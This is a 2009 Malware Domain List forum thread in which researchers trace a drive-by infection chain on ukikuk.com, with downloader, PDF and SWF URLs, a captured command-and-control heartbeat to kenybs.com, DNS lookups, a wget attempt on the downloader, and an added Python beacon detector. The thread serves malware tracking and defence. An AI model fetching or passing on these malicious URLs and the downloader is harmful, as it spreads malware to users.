Malware Domain List

Malware Related => Malicious Domains => Topic started by: eoin.miller on August 27, 2009, 10:18:19 pm

Title: ukikuk.com
Post by: eoin.miller on August 27, 2009, 10:18:19 pm
Obfuscated Javascript
ukikuk.com/deeefe/index.php
http://wepawet.iseclab.org/domain.php?hash=a15d6eb7cc67d282d5f50cb991390cb1&type=js

Redirects to get_val.php:
ukikuk.com/deeefe/get_val.php

Loads up the downloader:
ukikuk.com/deeefe/load.php?id=0
http://www.virustotal.com/analisis/5f4a011b8f5b1f1758b7c4bb3f76a74fabe6482664a598992b0a76b93a44e763-1251373604

Malicious PDF:
ukikuk.com/deeefe/cache/readme.pdf
http://wepawet.iseclab.org/view.php?hash=75aae957b92389ec2e52f22307e1be58&t=1251413095&type=js

Malicious SWF:
ukikuk.com/deeefe/cache/flash.swf
http://wepawet.iseclab.org/view.php?hash=253639a3e73fff185fbd4c489ab0335b&type=swf

Hacked site that references all this stuff:
campyonly.com


PDF/JavaScript/Flash stuff links back to URLs:
lowenbrau.ru - wepawet says this is known malware, but it isn't in the list?
engine.awaps.net - seems like a lot of chatter about this domain, but not in the list?
Title: Re: ukikuk.com
Post by: eoin.miller on August 28, 2009, 07:06:26 pm
Also after the malware is loaded, it calls home to kenybs.com (61.235.117.76).

Code:
POST /oewdppr/rwppwe.php HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: kenybs.com
Content-Length: 166
Connection: Keep-Alive
Pragma: no-cache

'EEidJ{%_M r]"lfr?I5icoo[r0!IvQ3CV@`7w4LpwVn2ge\IrSik5,?E?ER};2LfBDVH.cT[


HTTP/1.1 200 OK
Date: Thu, 27 Aug 2009 14:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
Content-Length: 44
Connection: close
Content-Type: text/html

'EEidJ\I*>AvNM rP"a

This heartbeat happens every 20 minutes.
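Added example, not from the thread: a small beacon-interval check in Python that runs over constructed proxy-log lines modelled on the heartbeat above (same host, path and 20-minute cadence); the log layout, the client addresses and the jitter threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log (not real traffic), one request per line:
# "timestamp client method host path status bytes_out"
SAMPLE_LOG = """\
2009-08-27T14:54:31 10.10.2.50 POST kenybs.com /oewdppr/rwppwe.php 200 166
2009-08-27T15:01:12 10.10.2.50 GET www.example.org /index.html 200 0
2009-08-27T15:14:30 10.10.2.50 POST kenybs.com /oewdppr/rwppwe.php 200 166
2009-08-27T15:34:33 10.10.2.50 POST kenybs.com /oewdppr/rwppwe.php 200 166
2009-08-27T15:54:29 10.10.2.50 POST kenybs.com /oewdppr/rwppwe.php 200 166
2009-08-27T15:20:05 10.10.2.51 POST www.example.org /login 200 512
2009-08-27T16:10:44 10.10.2.51 POST www.example.org /login 200 498
"""


def parse_posts(log_text):
    """Group POST timestamps by (client, host, path)."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, client, method, host, path, _status, _size = line.split()
        if method == "POST":
            events[(client, host, path)].append(datetime.fromisoformat(ts))
    return events


def find_beacons(log_text, min_hits=3, max_jitter=0.1):
    """Return {(client, host, path): interval_seconds} for POST series whose
    gaps are nearly constant (stdev/mean <= max_jitter), i.e. heartbeat-like.
    Ordinary user traffic (the /login pair) falls below min_hits or jitters."""
    beacons = {}
    for key, times in parse_posts(log_text).items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg <= max_jitter:
            beacons[key] = round(avg)
    return beacons


if __name__ == "__main__":
    for key, interval in find_beacons(SAMPLE_LOG).items():
        print(f"{key[0]} -> {key[1]}{key[2]} every ~{interval // 60} min")
```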
Title: Re: ukikuk.com
Post by: SysAdMini on August 28, 2009, 07:10:00 pm
ukikuk.com doesn't resolve any longer (NXDOMAIN).
Title: Re: ukikuk.com
Post by: eoin.miller on August 28, 2009, 10:02:44 pm
Hmm, weird. It is still working over here and DNS is still resolving:

Code:
user@hostname:~$ dig ukikuk.com

; <<>> DiG 9.5.1-P2 <<>> ukikuk.com
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 35353
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 4, ADDITIONAL: 4

;; QUESTION SECTION:
;ukikuk.com.                    IN      A

;; ANSWER SECTION:
ukikuk.com.             2485    IN      A       61.235.117.76

;; AUTHORITY SECTION:
ukikuk.com.             961     IN      NS      ns4.everydns.net.
ukikuk.com.             961     IN      NS      ns2.everydns.net.
ukikuk.com.             961     IN      NS      ns3.everydns.net.
ukikuk.com.             961     IN      NS      ns1.everydns.net.

;; ADDITIONAL SECTION:
ns1.everydns.net.       163887  IN      A       208.76.62.100
ns2.everydns.net.       163887  IN      A       208.76.56.56
ns3.everydns.net.       163887  IN      A       75.102.60.66
ns4.everydns.net.       163887  IN      A       78.129.207.168

;; Query time: 1 msec
;; SERVER: 10.10.2.3#53(10.10.2.3)
;; WHEN: Fri Aug 28 17:50:52 2009
;; MSG SIZE  rcvd: 192

user@hostname:~$ nslookup
> server ns1.everydns.net
Default server: ns1.everydns.net
Address: 208.76.62.100#53
> ukikuk.com
Server:         ns1.everydns.net
Address:        208.76.62.100#53

Name:   ukikuk.com
Address: 61.235.117.76
> exit

Can still pull load.exe from this URL as well:
ukikuk.com/deeefe/load.php?id=0

 ???
Title: Re: ukikuk.com
Post by: cleanmx on August 28, 2009, 10:19:46 pm
Nope, does not resolve for me ...

-- gerhard
Code:
host -a ukikuk.com
Trying "ukikuk.com"
Host ukikuk.com not found: 3(NXDOMAIN)
Received 101 bytes from 62.67.240.16#53 in 38 ms




ksrv8:~# host -a ukikuk.com ns4.everydns.net
Trying "ukikuk.com"
Using domain server:
Name: ns4.everydns.net
Address: 78.129.207.168#53
Aliases:

;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 64837
;; flags: qr aa rd; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 4

;; QUESTION SECTION:
;ukikuk.com. IN ANY

;; ANSWER SECTION:
ukikuk.com. 360 IN SOA ns1.everydns.net. hostmaster.ukikuk.com. 1251497007 3600 900 1209600 3600
ukikuk.com. 86400 IN NS ns1.everydns.net.
ukikuk.com. 86400 IN NS ns2.everydns.net.
ukikuk.com. 86400 IN NS ns3.everydns.net.
ukikuk.com. 86400 IN NS ns4.everydns.net.
ukikuk.com. 3600 IN A 61.235.117.76

;; ADDITIONAL SECTION:
ns1.everydns.net. 43200 IN A 208.76.62.100
ns2.everydns.net. 43200 IN A 208.76.56.56
ns3.everydns.net. 7200 IN A 75.102.60.66
ns4.everydns.net. 7200 IN A 78.129.207.168

Received 239 bytes from 78.129.207.168#53 in 45 ms



ksrv8:~# wget "http://ukikuk.com/deeefe/load.php?id=0"
--00:18:34--  http://ukikuk.com/deeefe/load.php?id=0
           => `load.php?id=0'
Auflösen des Hostnamen »ukikuk.com«.... fehlgeschlagen: Der Name oder der Dienst ist nicht bekannt.

Title: Re: ukikuk.com
Post by: Jaxryley on August 28, 2009, 11:44:12 pm
Can still pull load.exe from this URL as well:
ukikuk.com/deeefe/load.php?id=0
No go here either.
Code:
Firefox can't find the server at www.ukikuk.com.